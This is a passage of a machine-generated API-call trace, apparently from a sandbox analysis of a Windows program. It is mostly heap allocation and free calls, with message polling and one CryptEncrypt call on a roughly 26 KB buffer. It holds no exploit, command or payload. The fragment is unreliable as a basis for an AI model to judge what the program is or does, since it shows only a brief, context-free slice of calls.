[0087.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.156] CharLowerBuffW (in: lpsz="byte[26552]", cchLength=0xb | out: lpsz="byte[26552]") returned 0xb [0087.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.156] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.156] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.157] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.157] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.157] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0087.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69910 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x67b1) returned 0x2a970b8 [0087.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aa9d90 [0087.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.160] CryptEncrypt (in: hKey=0x9a3b80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a908f8*, pdwDataLen=0x8cef60*=0x67b1, dwBufLen=0x67b8 | out: pbData=0x2a908f8*, pdwDataLen=0x8cef60*=0x67b8) returned 1 [0087.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a30 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa060 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa060 | out: hHeap=0x2af0000) returned 1 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0087.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0087.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69910 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f78b8 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.165] PeekMessageW 